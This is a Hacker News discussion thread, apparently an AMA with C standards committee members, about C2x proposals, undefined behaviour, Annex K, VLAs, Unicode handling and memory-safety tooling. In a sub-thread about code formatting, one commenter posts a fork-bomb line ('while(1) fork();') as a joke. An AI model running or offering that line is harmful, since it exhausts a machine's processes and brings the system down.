Making C friendlier is always a good idea, and I think the committee is (slowly) working towards this goal. I would have to examine these papers by John Regehr in more detail. Looking quickly at his proposals I can see why there he couldn't find consensus for these ideas as some of them do appear controversial.

An example of a friendly dialect of C is always is C0 (C-naught) from CMU. I don't think I'm exaggerating when I say that this language has not "caught on".


The problem is that if the checks are always performed, the object code is significantly slowed down. If all computers supported the checking in hardware, then we could do it. You don't really want the current C approach (signal) to trigger except in an emergency, because there is no way to insert cleanup/retry/etc. recovery code via a signal handler.


Consider the following function:

    int test(int a, int b)
    {
      int c = a/b;
      if (f1())
        f2(a,b,c);
    }
Should a compiler be required to compute c before calling f1, and thus have to store the value of c across the function call?

Better would be to define a set of semantics for loosely-sequenced traps, along with "causality barriers" to ensure that they only occur at tolerable times.


Thanks for the AMA

1. Will the Apple's Blocks extension, which allows creation of Closures and Lambda functions, be included in C2X?

2. Are there any plans to improve the _Generic interface (to make it easy to switch on multiple arguements, etc.)?


> 1. Will the Apple's Blocks extension, which allows creation of Closures and Lambda functions, be included in C2X?

We haven't seen a proposal to add them to C2x, yet. However, there has been some interest within the committee regarding the idea, so I think such a proposal could have some support.

> 2. Are there any plans to improve the _Generic interface (to make it easy to switch on multiple arguements, etc.)?

I haven't seen any such plans, but there is some awareness that _Generic can be hard to use, especially as you try to compose generic operations together.


1. The reason I asked was because I remember reading the proposal as N2030[1] and N1451[2] a while back. Were these never actually presented for voting? (not sure how the commitee works)

[1]: http://www.open-std.org/jtc1/sc22/wg14/www/docs/n2030.pdf

[2]: http://www.open-std.org/jtc1/sc22/wg14/www/docs/n1451.pdf


Ah! No, those just predate my joining the committee and haven't really come up since they were presented.

Basically, every paper that gets submitted by an author will get some amount of discussion time at the next available meeting as well as feedback from the committee on the proposal. I'm not certain what feedback these papers received (we could look through the meeting minutes for the meetings the papers were discussed at to find out, though).


+1 for the first point. Every major compiler can do the lambda-lifting transformation, either because of C++ lambda or OpenMP support. It's frustrating doing this manually while knowing the compiler supports it internally, but does not expose it natively.


I know this opinion is unpopular and contradict with a core value of the C standardization committee but I personally think at some point, C standard should abandon supporting the legacy codebase. I think bool and stdint definitions should be available as part of the standard feature set and shouldn't need including their respective headers. These and some other features are available at the core of every modern language but C, and C has to provide them via other means. Is the sentiment of discontinuing legacy support shared within the committee, by any proportion?


We've started doing some things in this area, but I don't think the committee would abandon legacy code bases entirely. Instead, we try to make a migration path for code bases.

For instance, we added the '_Bool' data type and require you to include <stdbool.h> to spell it 'bool' instead and to get 'true' and 'false' identifiers. This was done to not impact existing code bases that had their own bool/true/false implementation with those spellings. Now that "enough" time has passed for legacy code bases to update, we're looking into making these "first-class" features of the language and not requiring <stdbool.h> to be included to use them. We're doing the same for things like _Static_assert vs static_assert, etc for the same reason.


Can't upvote enough. I think these changes could also be made in a way that can be mechanically-translatable.

For example: removing the register keyword, always requiring a return statement, etc etc.

A lot of changes can me made that will make static analysis easier.

There will always be people with 50 year old code bases that will never change (and some c89 compiler will always be there for them), but the language is pervasive enough that it deserves progressive changes to make it (even) simpler and safer and slightly more high level.


I'd love it if we could do away with all the headers.

Just #include <stdc.h> and be done with it. No need to remember stdio, stdint, stdbool, limits, assert, signal.h, etc, etc.

This new header comes with a guarantee that use of identifiers in the standard-reserved namespace will break your code. Perhaps compilers could even enforce this preemptively.


You can easily create your own stdc.h include file. Something similar was done on Plan 9.

Note that by including the content of all the headers, you're increasing the chance for collisions with application identifiers. You might consider that more of a benefit than a drawback.


Microsoft's "Checked C" seems to be the last attempt to fix C security flaws.

From the outside, after Annex K adoption failure, WG14 doesn't seem to be willing to make C safer in any way.

Are there any plans to take efforts like Checked C in consideration regarding the future of ISO C?


Ken Thompson, Rob Pike, Brian Kernighan, Russ Cox, Robert Griesemer are guys who created Unix, B, C, Go, Utf-8, etc. Maybe it will be useful to invite these guys(one of them) in the C Standards Committee for help to improve and design new language features?


I think a lot of these dudes are retired. A lot of good C people like P.J. Plauger, John Benito, and Clark Nelson have all retired recently. Anyway, they are all invited back. As an incentive, we typically have free coffee and snacks at most of the meetings. :)


I do find that C is difficult use for large programs. It there any thoughts that introducing features like namespaces.

Another thing very cumbersome is to do in C is object creation; creating instantiable objects is possible very cumbersome. Is there some feature in the thoughy process to deal with it. To make it clear, in C we can create a data structure like a Stack or a queue easily. But if the program needs 10 stacks then presently no simple way of achieving it.


In BRL's MUVES project, we used a 2-character prefix indicating category. E.g., all the external identifiers for our fancy memory allocator began with "Mm", where Mm.h documented the interface for the Mm package only.

To minimize the external identifiers, one could make just the name of a container structure the sole entry access handle, with structure members pointing to the functions. Then use it like:

  #include <Mm.h>
  if ((new = Mm.allo(size)) == NULL)
    Er.abort("out of memory");


Tip: you can use four leading spaces to write code.

    Like this


You only need two!

  like this


I tried, but two spaces yielded what you saw.


Huh, it also needed an extra line break before the first line of code. I didn't realize that! I've fixed it now.


I didn't realize that either, but it's described in formatdoc as such. So if you changed that behavior, probably should change the docs too.


I didn't change the behavior - I just added a newline. Sorry that wasn't clear.


You should be commended for the fast customer service!


I did not know that, after spending years on HN.

    while(1) fork();



C has been making strides towards complete Unicode support. I've been having trouble following along though: Am I correct in assuming that there's no actual multi-byte UTF-8 to UTF-32 Rune function and the best approximation depends on whatever wchar_t is? How would I best handle pure Unicode input and output scenarios on a "hostile" OS whose native character encoding is some EBCDIC abomination or a Windows codepage?


Converting arrays of utf8-encoded char to arrays of utf32-encoded 'rune' would probably not do what you want. That still leaves e.g. combining diacritical marks as separate from the characters they modify. If you care about breaking up text into codepoints, you probably also care about that sort of thing. The base unit of unicode is the extended grapheme cluster. In order to actually convert text into extended grapheme clusters, however, you need to have a database that tells you what kind of codepoint each codepoint is. Since c is standardized less frequently than unicode, any kind of unicode or utf support from the specification would quickly get out of date.


Probably link libicu rather than rely on libc.


libicu is a 40MB mess where you need only 5Kb of it. Only case folding and one normalization is needed, with tiny tables.

Additionally the used UNICODE_MAJOR and _MINOR are needed. They are always years behind, and you never know which tables versions are implemented.


  -Wl,--gc-sections


Are you looking for mbstowcs() or mbtowc() ?


wchar_t can be (a) not Unicode in any way, or (b) 16-bit, insufficient to represent a rune.


Will C eventually get something like C++' constexpr?


C has some basic support for constant expressions already, but there has not yet been a proposal to bring 'constexpr' over from C++. Personally, I would love this feature to be in C!


You and me both!


This is really the only thing that I really want from C++. It would be amazing if this could make the cut for a future spec.

EDIT: I work on embedded systems, where C is king, and it seems like a spend an inordinate amount of time working with code generators that build simple tables. All of which could go away with this feature.


Why do you want it in C? What are your use cases?

I’ve always thought that idiomatic C for constexpr would be to write the code you want to be executed at compile-time in a separate file(s), build it, execute and then #include the result in your program before building the final executable, adding a build step but keeping overall complexity minimal.

This is different from C++ approach, where everything and the kitchen sink is added to the standard and then you have to issue errata for errata for the standard and hope that the compiler you have to use for your current platform is keeping up for the last changes.


What are two or three C codebases that are elegantly and cleanly written, and that every mid-level C programmer should read for sake of knowledge?


I would recommend musl, although the style is a bit idiosyncratic in places: https://www.musl-libc.org

Mbed TLS, since I have it in mind from another thread, is also a pretty clean C library for the problem it tries to solve; it's a testament to its design that we (TrustInSoft, who had not participated to its development) were able to verify that some uses of the library were free of Undefined Behavior: https://tls.mbed.org


> "I would recommend musl, although the style is a bit idiosyncratic in places: https://www.musl-libc.org"

Opened a random part of musl out of sheer boredom. Here's what I see:

https://git.musl-libc.org/cgit/musl/tree/include/aio.h

A bunch of return codes #defined like so (see https://git.musl-libc.org/cgit/musl/tree/src/aio/aio.c):

#define AIO_CANCELED 0 #define AIO_NOTCANCELED 1 #define AIO_ALLDONE 2

#define LIO_READ 0 #define LIO_WRITE 1 #define LIO_NOP 2

#define LIO_WAIT 0 #define LIO_NOWAIT 1

Why weren't they using an enum instead? I wouldn't sign off on this code (and I don't think it lives up to best practices).


musl is implementing POSIX. POSIX requires those constants to be preprocessor defines. (Generally, musl asssumes the reader is quite familiar with the C and POSIX standards, which makes sense since it's a libc implementation.)


PostgreSQL


I love how small of a language C is and get concerned when people recommend adding feature x,y and z.

What's the plan for C over the next 5 - 10 years?


There is no grand goal that I know of. I wish more importance were being placed on keeping existing well-written code working, which includes continued support for what might be considered near-obsolete. If one wanted to design a new (not fully compatible) language, that could have lofty goals; just don't call it "C".


I'm about a mid-level experienced developer, and have been attempting to learn C via a few side projects. I come from mostly Python and Go, which both have very robust standard libraries, so I was quite surprised to find that string parsing is very poorly supported in C. Is there a reason that very common string parsing cases are missing from the C stdlib?


What are the chances of typeof, or statement expressions, finding their way into the C standard? They're already widely implemented.


Several of us discussed typeof and I'd expect a proposal for a feature along these lines to be well received. (I recall someone even saying they're working on one but that shouldn't stop anyone from submitting one of their own.)


I'm glad to hear that.

What about statement expressions? They're quite useful, and supported by multiple independent compilers.


I'm not aware of recent proposals for those but we have discussed ideas along those lines (closures: N2030, C++ lambdas, Apple Blocks: N1451, and I think there was one from Cilk). I think there was interest but not enough support for the details and likely also concerns from implementers.


What’s the current committee thinking on providing locale-independent conversions from potentially-invalid UTF-8 to valid UTF-8, from potentially-invalid UTF-8 to valid UTF-16, and from potentially-invalid UTF-16 to valid UTF-8 (i.e. replacing ill-formed sequences with yhe REPLACEMENT CHARACTER)?


If you changed UTF-16 to UTF-32 or UCS-4 I'd support it. I think there are already implementations that use the replacement character for all "impossible" codes.


What’s your use case for UTF-32?


There are several multibyte character manipulations that are easier if there is a uniform-sized encoding (wchar_t).


Are any concurrency primitives planned for introduction in future C revisions?


We currently have not seen papers proposing to add new concurrency primitives for C2x, but we have been actively working on the concurrency object model and would welcome proposals for new primitives or concurrency-related fixes.

One goal is to re-unify C with the concurrency object model used by C++ to make std::atomic<T> and _Atomic(T) be ABI compatible as intended in C11. Some small fixes in this area are the removal of ATOMIC_VAR_INIT, clarifying whether library functions can use thread_local storage for internal state, and things along those lines. However, we expect there to be more efforts in this area as we progress the standard.


Hi,

Do you think Annex K of C11 will be widely adopted by programmers or unused? Why aren't people adopting it?

Do you see the use of any analysis tools that are particularly effective for finding memory safety issues?

C++ added in smart pointers to its specification. Are there any plans to do something similar in future C specifications?

Thanks!


> Do you think Annex K of C11 will be widely adopted by programmers or unused? Why aren't people adopting it?

So far, it's not been widely adopted. Part of the issue is that there are specification issues relating to threads and the constraint handlers, and part of the issue is that popular libc implementations have actively resisted implementing the annex.

That said, I field questions about Annex K on a regular basis and there are a few implementations in the wild, so there is user interest in the functionality.

> Do you see the use of any analysis tools that are particularly effective for finding memory safety issues?

<biased opinion>I think CodeSonar does a great job at finding memory safety issues, but I work for the company that makes this tool.</biased opinion>

I've also had good luck with the memory and address sanitizers (https://github.com/google/sanitizers) and tools like valgrind.

> C++ added in smart pointers to its specification. Are there any plans to do something similar in future C specifications?

We currently don't have any proposals for adding smart pointers to C. Given that C does not have constructors or destructors, we would have to devise some new mechanism to implement or replace RAII in C, which would be one major hurdle to overcome for smart pointers.


I’ve had good luck (in C++) replacing the underlying memory allocator with one that tracks leaks by allocation type (which is fast enough for production use).

This can be done in C, but the calling code has to spell malloc and free differently.

In debug mode, configuring malloc to poison (and add fences) on allocation and free finds most of the remaining things.

These techniques tend to have much lower runtime overhead than valgrind (2-digit percentages vs 5-10x), so they can be left on throughout testing and partially enabled in production.

They find >90% of the memory bugs that I write (assuming valgrind finds 100%). YMMV.


> We currently don't have any proposals for adding smart pointers to C. Given that C does not have constructors or destructors, we would have to devise some new mechanism to implement or replace RAII in C, which would be one major hurdle to overcome for smart pointers.

why would you have to devise a new mechanism and not borrow one from one of the thousand other mechanisms already existing in PL litterature for this ?


Annex K isn't being adopted because it's unergonomic and doesn't solve the problem it purports to. Even the proposer (Microsoft) does not actually implement Annex K as specified in the ISO.


Microsoft originally implemented the Annex K Bounds checked interfaces (e.g., the *_s functions) back in the 1990s in response to well-publicized vulnerabilities. They proposed standardization to the C Standards committee. The committee made many changes to the proposal, possibly going too far away from the original implementation. During this time, I would say that Microsoft was very differential to the wishes of the committee.

By the time the ISO/IEC TR 24731-1:2007 was released, and then later Annex K added to the C Standard, Microsoft had to decide if they wanted to change the interfaces to conform to the changed standard and re-implement their code bases. They presumably decided that they did not, which I think is a defensible decision.

As to unergonomic, examples please?


I think we are in agreement that Microsoft does not implement Annex K as specified in ISO C. I don't fault them for that; I wouldn't either.

As to unergonomic, that's somewhat subjective. But I'm a long-time C practitioner and that's my feel of the API. Constraint handlers are a mistake. Ambient state that is not part of the function interface, as well as asynchronous interaction, make for poor APIs. Constraint handlers are a mismatch for library use of safe functions, as well as kernel environments.

Most functions seem pointless; e.g., snprintf_s. Re-adding gets() in the form of gets_s() seems unhelpful. Why bsearch_s, qsort_s, memcpy_s/memmove_s?? Do you really think strerror_s() is useful? Or strnlen_s()?


Wrong. Many implemented them, Microsoft as first, followed by Cisco, Watcom, Embarcadero, Huawei and Android. Widely used in Windows, Embedded and phones.

Microsoft just changed one bit of the proposal, but no one followed them there. Currently it's the most widely used and worst implemented. I tested all of them.

It solves the bounds checking problem better than _FORTIFY_SOURCE, ASAN and valgrind, because it does the checks always, if compile-time or run-time, independent on the optimizer, the used intrinsics, where valgrind fails, and is much faster than ASAN. Also faster than glibc btw.


What is the story behind the removal of VLAs from C99 in later revisions?


VLAs are still present in C17 and have not been removed. They are, however, an optional feature with a truly weird (IMHO) feature testing macro. If '__STDC_NO_VLA__' is defined to 1, then the implementation does not support VLAs.

IIRC, this macro was added to C11 along with a batch of other "these are optional" macros for atomics, complex, threads, etc. However, I don't recall whether C99 adopted the features as optional features and missed the feature testing macro, or if they were required features in C99 that we made optional in C11.


Complex and VLA were required by C99, but made optional in C11. The others were new in C11.


So I spend a possibly unreasonable amount of time and page space discussing VLAs in the Effective C book. I understand there are some problems with them, but for what it is worth, I really like the feature, particularly when used in function prototype scope.


I usually don't let them leak into public interfaces, and don't allocate VLAs, but really like VLA pointers for multi-dimensional array processing such as []:

  double (*a)[N][P] = (double (*)[N][P])a_flat;
  for (i=0; i<M; i++)
    for (j=0; j<N; j++)
      for (k=0; k<P; k++)
        a[i][j][k] = f(i, j, k);
The alternative would be

        a_flat[(i*M+j)*P+k] = f(i, j, k);
which is a lot more error-prone. I understand that some implementation (MSVC) declined to implement VLAs, but I really wish that at least VLA-pointers could have remained a mandatory part of C11 and later standards.

[] Has there been any discussion of adding GCC's "typeof" to the standard?


They did not remove them, but made them optional.

Is a controverial feature, that can produce bugs, and are banned in a lot of project (one famouse, the Linux kernel).


I can't live without it.


What removal? C11 section 6.7.6.2 specifies the semantics.


What the parent comment probably meant is that support for VLA was required in C99, but is no longer required in C11, so while code written for C99 could use VLAs without any special consideration, code written for C11 cannot depend on VLAs since it might not be present in all compilers.


I think C is an exceptional good language for a long time, but the world is changing and maybe C must evolve with new trends, new researches in programming languages.

In my view C and C++ now almost different languages with a different philosophy of programming, different future, and different language design.

It will be sad if "modern" C++ almost replace C. Many C++ developers use "Orthodoxy C++" https://gist.github.com/bkaradzic/2e39896bc7d8c34e042b, and this shows that people will be more comfortable with C plus some really useful features(namespaces, generics, etc), but not modern C++. I very often hear from my job colleagues and from many other people who work with C++ is how terrible modern C++ (https://aras-p.info/blog/2018/12/28/Modern-C-Lamentations/, https://www.youtube.com/watch?v=9-_TLTdLGtc) and haw will be good to see and use new C but with some extra features. Maybe time to start thinking about evolution C, for example:

  - Generics. Something like generics in Zig, Odin, Rust. etc.
  - AST Macros. For example Rust or Lisp macroses, etc.
  - Lambda
  - Defer statement
  - Namespaces
What do you think?

https://ziglang.org/documentation/master/#Generic-Data-Struc...

https://odin-lang.org/docs/overview/#parametric-polymorphism

https://doc.rust-lang.org/rust-by-example/generics.html


One of my favorite features recently while developing C for embedded systems has been the --wrap linker flag that allows me to effectively test code that interacts with hardware without modifying the source.

By passing -Wl,--wrap=some_function at link time with test code we can then define

  __wrap_some_function
that will be called instead of some function. Within __wrap_some_function one can also call __real_some_function which will resolve to the original version if you still want to call the original one. This is especially useful if trying to observe certain function calls in tests that interact with hardware.

Do you have any other recommendations/preferences to help with unit-testing C code?


I'm no C expert, but my two wishes for C would be:

- Basic type inference to reduce keystrokes, and prevent ripples when changing types. (like auto in C++)

- Equality operators defined for structs. Perhaps even lexicographical comparison, if I'm dreaming.

Any thoughts on either of those?


Things I would like C to have:

- stricter type-checks on typedef types (useful when passing function parameters) - gcc's ' warn_unused_result' attribute for functions (ensure error returns are checked) - on-entry/on-exit qualifiers for functions (to do things like make sure you lock/unlock semaphores for instance before entry/exit of function) - D language's 'scope' feature (better handling of error path) - loops in the c pre-processor! (better code-gen)

Any chance any of this is on the radar for the next-gen C standard? Some of these are just ergonomics, but the first two might've have saved me some grief a few times.


typedef, in spite of the name, doesn't create a new type. It only creates a new name for an existing type. Changing that would break existing code.

I wouldn't mind seeing a new feature that does define a new type (one that's identical to, but incompatible with, an existing type), but we can't call it "typedef".

In a sense that feature already exists. You can define a structure with a single member of an existing type. But you have to refer to the member by name to do anything with it.


Yeah, I don't program much in C and I don't have a question. I'm here just to congratulate everyone involved for this amazing thing. It's awesome to see people take the time to help each other. Nice job!


Can memory safety be ensured in the C programming language? By static analysis at compile time for example?


It is possible to guarantee that a C program does not have any undefined behavior, which includes all the memory errors that are often also security vulnerabilities.

“Static analysis” may be the wrong name to classify the tools that work in that area, because “static analysis” is usually used for purely automatic tools, whereas the tools used to guarantee the absence of undefined behaviors are not entirely automatic except for the simplest of programs.

Results of a static analyzer are often characterized in terms of “false positives” and “false negatives”. It is a possible design choice to make an analyzer with no false negatives. It is absolutely not impossible! (Some people think it is fundamentally impossible because it sounds like a computer science theorem, but it isn't one. The theorem would apply if one intended to make an analyzer with no false positives and no false negatives—and if computers were Turing machines.)

Analyzers designed to have no false positives are called “sound”. In practice, this kind of analyzer may prove that a simple program is free of Undefined Behavior if the program is a simple example of 100 lines, but for a more realistic software component of at least a few thousand lines, the result will be obtained after a collaborative human-analyzer process (in which the analyzer catches reasoning errors made the human, so the result is still better than what you can get with code reviews alone).

Here is what the result of this collaborative human-analyzer process may look like for a library as cleanly designed and self-contained as Mbed TLS (formerly PolarSSL): https://trust-in-soft.com/polarSSL_demo.pdf?


Does the committee have any plans to document the rationale for each kind of Undefined Behavior?

Does the committee have any plans to make NULL pointer arguments to memcpy non-UB when the size argument is 0?


> Does the committee have any plans to document the rationale for each kind of Undefined Behavior?

In the C99 timeframe, we had a rationale document that was separately maintained. My understanding (this predates my joining the committee) is that this was prohibitively labor-intensive and so we stopped doing it for C11. I don't know of any plans to start doing this again, even in a limited sense for justifying UB. That said, we do spend time considering whether an aspect of a proposal requires UB or not, so the rationale exists in the proposals and committee minutes.

> Does the committee have any plans to make NULL pointer arguments to memcpy non-UB when the size argument is 0?

I have not seen such a proposal, and suspect that implementations may be concerned about losing their optimization opportunities from such a change. (Personally, I'd be okay losing those optimization opportunities as this does not seem like a situation where UB is necessary.)


Why isn't there a binary prefix in the standard? Like 0b0111010?


In my opinion C is good as it is. C++ is terrible complicated mess, always have been and adding more and more "modern" functionality isn't helping it much. There are great standard functions, e.g. for strings in C, whereas it is often very inconvenient or complicated to do simple things like uppercase string in C++. I always ended up basically using C with just basic OOP functionality from C++. But I am not writing in C/C++ daily so my opinion is not very important...


The syntax used in the following function definition is said to be obsolescent in C11:

int f (a, n) int n; int a[n][n]; { return a[n-1][n-1]; }

How could one define this function without using the obsolete syntax?


You couldn't in that parameter order. However, you could do this: int f(size_t n, int a[n][n]) { return a[n-1][n-1]; }

(https://godbolt.org/z/DV9c-C)

Btw, that definition was obsolescent in C89 too.


Well, yes. But putting the array argument(s) first is the more natural order, in my opinion. And it is surely odd that only one order is allowed in this context, when otherwise C is happy with changing the order of parameters to be whatever you like.

Plus, of course, there may be existing code using such functions, with parameters in the order that would become impossible if this syntax were disallowed.


What do you think of a variant on this?

https://blog.regehr.org/archives/1180


I still want to write at least one sequel to that post, on the theme “Alright, can we make a Friendly C Compiler by disabling the annoying optimizations, then?”.

Obviously the people who want a Friendly C Compiler do not want to disable all optimizations. This would be easy to do, but these users do not want the stupid 1+2+16 expressions in their C programs, generated through macro-expansion, to be compiled to two additions with each intermediate result making a round-trip through memory.

So the question is: can we get a Friendly C Compiler by enabling only the Friendly optimizations in an unfriendly compiler?

And for the answer to that, I had to write an entire other blog post as preparation, to show that there are some assumptions an optimizing compiler can do:

- that may be used in one or several optimizations, but the compiler authors did not really keep track of where they were used,

- that cannot be disabled and that the compiler maintainers will not consider having an option to disable,

- and that are definitely unfriendly.

Here is the URL of the blog post that I had to write in preparation for the upcoming blog post about getting ourselves a Friendly C Compiler: https://trust-in-soft.com/blog/2020/04/06/gcc-always-assumes... . I recommend you take a look, I think it is interesting in itself.

You will have guessed that I'm not optimistic about the approach. We can try to maintain a list of friendly optimizations for ourselves, though, even if the compiler developers are not helping. This might still be less work that maintaining a C compiler.


> Here is the URL of the blog post that I had to write in preparation for the upcoming blog post about getting ourselves a Friendly C Compiler: https://trust-in-soft.com/blog/2020/04/06/gcc-always-assumes.... . I recommend you take a look, I think it is interesting in itself.

So, it's definitely interesting -- I think a lot of odd stuff you can do should probably be undefined. Eliminating pointer accesses after a null check sounds A-ok to me, because your program should never dereference null.

Another interesting thought is requiring more of these things that lead to miscompilation to produce compile time diagnostics.


pascal_cuoq cowrote it. Maybe we should ask him if his views have changed since then.

Btw, there was a thread about it at the time: https://news.ycombinator.com/item?id=8233484.


Thanks Dan, I missed this question in the heat of the moment.


Can you do anything to push Microsoft to implement recent C standards? Their failure to fully implement even C99 in Visual Studio is holding the language back.


Not really -- vendors are free to ignore newer releases of the standard that do not meet their customers needs and the committee can't do much about it.

However, as a user, you can help apply pressure on the vendor to support newer standards. For instance, with Microsoft, you could support this feedback request: https://developercommunity.visualstudio.com/idea/387315/add-...


There is little that the C Standards group can do about it. One idea is to write a C Standards conformance into contracts. When I was in the government we often did that, but it still wasn't enough clout.


My understanding is that Microsoft doesn't want to support C, and the only reason Visual Studio supports C at all is for legacy code. Also, you can use 3rd-party compilers with Visual Studio.

Really, anyone writing C nowadays should ignore Microsoft's compiler, and tell Visual Studio users to install Clang.


Would you consider adding a built-in way to safely multiply two numbers?

Numeric overflows in things like calculation of buffer sizes can lead to vulnerabilities.

Signed overflow is UB, and due to integer promotion signs creep in unexpected places.

It's not trivial to check if overflow happened due to UB rules. A naive check can make things even worse by "proving" the opposite to the optimizer.

And all of that is to read one bit that CPUs have readily available.


There are a lot of arithmetic conditions for which C could generate special code. There are div_t-related functions for the other direction. I for one would like a good way to obtain, using some Standard C coding pattern, fast "carry" for multiple-precision integer arithmetic.

Several places in support functions, I have coded unusually to avoid wrap-around etc. I bet you could devise something like that for (unsigned) multiplication.


A horrifying case was multiplication in an x86 emulator. The opcode handler needed to multiply a pair of unsigned 16-bit values, then return a 64-bit result.

The uint16_t got promoted to an int for the multiplication, causing undefined behavior. (if I remember right, the result was assigned to a uint16_t as well, making the intent clear) The compiler then assumed that the 32-bit intermediate couldn't possibly have the sign bit set, so it wouldn't matter if promotion to a 64-bit value had sign extension or zero extension. Depending on the optimization level, the compiler would do one or the other.

This is truly awful behavior. It should not be permitted.


I can't really blame gcc for that one, since the most straightforward way of using signed integer arithmetic would yield a negative value if the result is bigger than INT_MAX, but it would be very weird that programs would expect and rely upon that behavior.

On the other hand, even the function "unsigned mul_mod_65536(unsigned short x, unsigned short y) { return (x * y) & 0xFFFF; }" which the authors of the Standard would have expected commonplace implementations to process in consistent fashion for all possible values of "x" and "y" [the Rationale describes their expectations] will sometimes cause gcc to jump the rails if the arithmetical value of the product exceeds INT_MAX, despite the fact that the sign bit of the computation is ignored. If, for example, the product would exceed INT_MAX on the second iteration of a loop that should run a variable number of iterations, gcc will replace the loop for code that just handles the first iteration.



See post above. There is no good way for compilers to handle that case, but gcc gets "creative" even in cases where the authors of C89 made their intentions clear.


Is there any reason to keep the undefined behavior for shifts of negative numbers, instead of making it implementation defined? Most compilers (for twos-complement architectures at least) are not using that latitude, and I would also guess that most programs that are written for twos-complement arithmetic likewise not expecting undefined behavior for non-overflowing left shifts of negative numbers. Thanks!


"Implementation-defined" is a nuisance, because then you need to add code for all the variations, which also requires a set of standard macros, etc. It is easier and less trouble-prone to just avoid using the currently undefined behavior.


Will Effective C cover the strict aliasing rule and also why the BSD sockets API seems to get away with it (e.g. (sockaddr *) &sockaddr_in)?


I don't think the book covers strict aliasing, at least not in detail.


I thought we had fixed the BSD socket aliasing a long time ago?


Isn't that legal if they are all in a union?


(1) Explain just how malloc() and free() work under the covers and the implications for multi-threading, memory leaks, virtual memory paging, etc.

Maybe also cover some means, algorithms, and code for reporting on the state, status, etc. of the memory use by malloc() and free().

By the way, I know and have known well for longer than most C programmers have lived JUST what the heap data structure, as used in "heap sort", is. But what is the meaning of "the heap" in C programming language documentation?

(2) Cover in overwhelmingly fine detail the "stack" and the chuckhole in the road, stack overflow.

(3) Where to get a reliable package for a reasonable package of code for handling character strings -- what I saw and worked with in C is not reasonable.

(4) From the C programming I did, it looks like a large C program for significant work involves some hundreds, maybe tens of thousands, of includes, inserts, whatever, and what a linkage editor would call external references. There must somewhere be some tools to help a programmer make sense of all those includes and references, the resulting memory maps, issues of locality of reference, word boundary alignment, etc.

(5)How can C exploit a processor with 64 bit addressing and main memory in the tens of gigabytes and maybe terabytes?

(6) How can C support, i.e., exploit, integers and IEEE floating point in 64 and/or 128 bit lengths?

(7) How to handle exceptional conditions with, say, non-local gotos and without danger of memory leaks?

(8) Sorry, but far and away my favorite programming language long has been and remains PL/I, especially for its scope of names rules, handling of aggregates with external scope, its data structures, and its exceptional conditional handling with non-local gotos and freeing automatic storage and, thus, avoiding memory leaks. Of course I can't use PL/I now, but the problems PL/I solved are still with us, also when writing C code. So, how to solve these problems with C code?

(9) For C++, please explain how that works under the covers. E.g., some years ago it appeared the C++ was defined as only a source code pre-processor to C. Is this still the case? If so, then explaining C++ under the covers should be feasible and valuable.


(1) There are several implementations; most are based on Knuth's "boundary tag" algorithms. As to "heap", a stack has one accessible end, a heap is essentially random-accessible. Nothing to do with the heap data structure. (2) Stack overflow can occur even early within a program. I've campaigned for a requirement that such overflows be caught and integrated into a standard exception handler, to no avail. (3) Why not code your own, so there won't be arguments about it. (4) There are lots of tools for program development, but it's not standardized by WG14. (5) Use wider integer types. (6) Use wider floating representations. (7) Standard C doesn't specify such a facility, but it has occasionally be suggested. (8) There were a lot of books, e.g. on structured system analysis, during the 1970s trying to apply lessons learned. C isn't special in that regard, as many of the big problems don't involve syntax. (9) C++ is now a big language and it takes a lot of work to master its internals.


> But what is the meaning of "the heap" in C programming language documentation?

The C language standard does not contain the word "heap" anywhere; as far as C is considered, there is no "heap" in particular.


It has been many years since a C++-to-C preprocessor has been commonplace. There's just too much new stuff in recent C++ to map it all easily into straight C.


(7) Exactly. Please add how to free memory in standard way if there's an exception, and how not to use GoTo in such cases.


> Explain just how malloc() and free() work under the covers and the implications for multi-threading, memory leaks, virtual memory paging, etc. > > Maybe also cover some means, algorithms, and code for reporting on the state, status, etc. of the memory use by malloc() and free().

Strictly speaking, these are implementation details that the C standard leaves unspecified. If you want to know how the memory allocation functions work or methods for inspecting the state of the heap you'll need to look at a specific implementation (e.g., glibc, musl, jemalloc, etc.) since the details can vary wildly between implementations.

> Cover in overwhelmingly fine detail the "stack" and the chuckhole in the road, stack overflow.

Both these are not really specific to C, and there should be a lot of resources you can find that explain these concepts ([0], [1] for some example general explanations). Did you have more specific questions in mind?

> How can C exploit a processor with 64 bit addressing and main memory in the tens of gigabytes and maybe terabytes? > How can C support, i.e., exploit, integers and IEEE floating point in 64 and/or 128 bit lengths?

I think pointer/integer sizes are implementation details. C specifies pointer behavior and minimum integer sizes (and optional fixed-width types), but the precise widths are chosen by the implementation. In the case of floating-point, the sizes are specified by IEEE 754 widths.

In other words, you don't really need to do anything special as long as you pick the appropriate types as defined by your implementation.

> For C++, please explain how that works under the covers. E.g., some years ago it appeared the C++ was defined as only a source code pre-processor to C. Is this still the case?

As far as I know no (production-quality?) C++ compiler has been implemented as a source-level preprocessor for basically the entirety of C++'s existence [2]. The very first "compiler" for C++ was Cpre, back when C++ was still the C dialect "C with classes" (around October 1979), and that was indeed a preprocessor. That was replaced by the Cfront front end around 1982-1983, about when "C with classes" started gaining new features and got a new name. Cfront is a proper compiler front end that output C code, and I think from that point on C++ compilers used "standard" compiler tech.

[0]: https://stackoverflow.com/questions/79923/what-and-where-are... [1]: https://en.wikipedia.org/wiki/Stack_overflow [2]: http://www.stroustrup.com/hopl2.pdf


Thanks.

> Did you have more specific questions in mind?

On stack overflow, my understanding was that could encounter that fatal condition from suddenly a too deep call stack, that is, too many calls without a return. So, if the "stack" is a, say, finite resource, then the programmer should know in the code how much of that resource is being used and act accordingly.

For a preprocessor for C++, I IIRC at one point the definition of C++ was in terms of a preprocessor -- I was just thinking of the definition, that is, get a more explicit definition of C++. I've always understood that always or nearly so C++ implementation was usual compilation. The issue is that at least at one time it seemed difficult to be precise about C++ semantics, that is, what the code would do and how it would do it. Maybe now C++ is beautifully documented.


> So, if the "stack" is a, say, finite resource, then the programmer should know in the code how much of that resource is being used and act accordingly.

And this is true, but IIRC statically determining stack bounds for arbitrary programs is not an easy problem to solve, especially if you call into opaque third-party libraries.

> For a preprocessor for C++, I IIRC at one point the definition of C++ was in terms of a preprocessor

I wouldn't know about defining C++ in terms of transformations to C, and searching for that is more difficult. I would guess that the abandonment of the preprocessor approach to compilation would also have meant the abandonment of defining C++ in terms of C, especially once C++ really started picking up features.

> The issue is that at least at one time it seemed difficult to be precise about C++ semantics, that is, what the code would do and how it would do it. Maybe now C++ is beautifully documented.

C++ has had a formal specification since 1998, which might count as documentation for you.


If the Standard were to make recursion an optional feature, many programs' stack usage could be statically verified. Indeed, there are some not-quite-conforming compilers which can statically verify stack usage--a feature which for many purposes would be far more useful than support for recursion.


